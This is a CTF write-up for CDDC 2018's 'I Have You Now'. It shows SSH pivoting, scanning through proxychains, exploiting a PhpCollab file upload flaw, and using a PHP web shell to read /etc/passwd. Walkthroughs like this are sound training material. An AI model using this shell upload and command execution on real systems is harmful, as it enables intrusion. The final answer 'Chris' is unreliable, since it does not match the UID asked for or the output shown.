CDDC 2018: I Have You Now

Category: Kamikaze Points: 239 Description:

  1. From your position on target, exploit the target and gain access to the file ' /etc/passwd ' .
  2. Inside the file, identify the UID of the user whose username starts with the case-sensitive letter ' C ' .
  3. Enter the correct UID value into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.


After that nmap fun, we continue. This challenge took me a fair bit but instead of wasting time on finding the exploit, I was tinkering with my proxy setup. I ended up using a version of a multi-hop SSH relay to do the hacking locally. The setup of the proxy is something like this,

root@ctf:~# ssh -L 1080: -4
root@'s password: 
Last login: Sat Jun  2 17:36:11 2018 from
[root@fw2018 ~]# ssh -D 1081 hero@ -4
hero@'s password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:

  System information as of Sat Jun  2 09:26:06 UTC 2018

  System load:  0.0               Processes:           82
  Usage of /:   21.6% of 9.81GB   Users logged in:     0
  Memory usage: 3%                IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

  Get cloud support with Ubuntu Advantage Cloud Guest:

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Sat Jun  2 09:26:06 2018 from

Now to access the internal network like I was, I would just proxy everything through, in a SOCKS5 manner.

So, first up, would be to nmap our target,

root@ctf:~# proxychains4 nmap -sT -sV
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/

Starting Nmap 7.60 ( ) at 2018-06-02 10:56 UTC
Nmap scan report for
Host is up (0.045s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.15 ((CentOS))
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

Okay, so we have a couple of services and an interesting MySQL server. What do we do now? Well, let's try exploring our options! First, let's try the most obvious apple in the bucket,

root@ctf:~# proxychains4 nc 3306
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
h?jHost 'cddc-t041-ot-svr1.c.bitnami-qivcfh0ekq.internal' is not allowed to connect to this MySQL server

That doesn't seem to work, let's try the Apache server. At our first glance, the server seems to be entirely unconfigured.

root@ctf:~# proxychains4 curl
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
    <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

Let's whip out the dirbuster applications and see what we can find,

msf >  use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set rhosts
rhosts =>
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[+] Found 403 (
[+] Found 403 (
[+] Found 200 (
[+] Found 302 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, some interesting directories. Let's take a gander at the 302 redirection and in here, we find an interesting application.

root@ctf:~# proxychains4 curl -L
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Powered by PhpCollab v2.5.1 //-->
<meta http-equiv='Content-Type' content="text/html; charset=ISO-8859-1" />
<meta name='robots' content='none' />
<meta name='description' content='Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).' />
<meta name='keywords' content='PhpCollab,, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup' />
<meta name='copyright' content='PHPCollab' />
<script type='text/Javascript'>
var gBrowserOK = true;
var gOSOK = true;
var gCookiesOK = true;
var gFlashOK = true;
// -->
<script type='text/javascript' src='../javascript/general.js'></script>
<script type='text/JavaScript' src='../javascript/overlib_mini.js'></script>
<link rel='stylesheet' href='../themes/default/stylesheet.css' type='text/css' />

<body onLoad='document.loginForm.loginForm.focus();'><div id='overDiv' style='position:absolute; visibility:hidden; z-index:1000;'></div>

<p id="header"><img src="../logos_clients/1.php" border="0" alt=""></p>

<p id='account'>&nbsp;</p>

<p id='navigation'><a href='../general/login.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Log In</a>&nbsp;&nbsp;<a href='../general/systemrequirements.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>System Requirements</a>&nbsp;&nbsp;<a href='../general/license.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>License</a></p>

<p class='breadcrumbs'>&nbsp;</p>

<a name='loginAnchor'></a>

<form accept-charset='UNKNOWN' method='POST' action='../general/login.php?auth=test&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4' name='loginForm' enctype='application/x-www-form-urlencoded'>

<h1 class="heading">PhpCollab : Log In</h1>

<table class='content' cellspacing='0' cellpadding='0'><tr><th colspan='2'>Please log in</th></tr><tr class='odd'><td valign='top' class='leftvalue'>Language :</td><td><select name="defaultLanguage"><option value="ar">Arabic</option><option value="az">Azerbaijani</option><option value="pt-br">Brazilian Portuguese</option><option value="bg">Bulgarian</option><option value="ca">Catalan</option><option value="zh">Chinese simplified</option><option value="zh-tw">Chinese traditional</option><option value="cs-iso">Czech (iso)</option><option value="cs-win1250">Czech (win1250)</option><option value="da">Danish</option><option value="nl">Dutch</option><option value="en" selected>English</option><option value="et">Estonian</option><option value="fr">French</option><option value="de">German</option><option value="hu">Hungarian</option><option value="is">Icelandic</option><option value="in">Indonesian</option><option value="it">Italian</option><option value="ja">Japanese</option><option value="ko">Korean</option><option value="lv">Latvian</option><option value="no">Norwegian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="sk-win1250">Slovak (win1250)</option><option value="es">Spanish</option><option value="tr">Turkish</option><option value="uk">Ukrainian</option></select>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* User Name :</td><td><input value='' type='text' name='loginForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* Password :</td><td><input value='' type='password' name='passwordForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>&nbsp;</td><td><input type='submit' name='save' value='Log In'><br/><br/><br/><a href='../general/sendpassword.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Forgot password ?</a>&nbsp;</td></tr>
<hr />
<p id="footer">PhpCollab v2.5.1 </p>


What's PhpCollab anyways? Well, it's some weird application, the purpose of it isn't important, but rather, now we have a name and a version. A fast Google gives us an exploit for arbitary file upload.

Since with that exploit, we can upload anything we want, let's dummy up a simple PHP shell page.

    $cmd = ($_REQUEST['cmd']);

Proceed to upload it,

root@ctf:~# proxychains4 ./ 1 shell.php 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
[*] Trying to exploit with URL :
[OK] Backdoor link :

Now that our payload PHP shell has been uploaded at, we can get our hacking done!

root@ctf:~# proxychains4 curl '' --data 'cmd=cat /etc/passwd'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  ...  ...  OK
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

Therefore, the flag is Chris.

results matching ""

    No results matching ""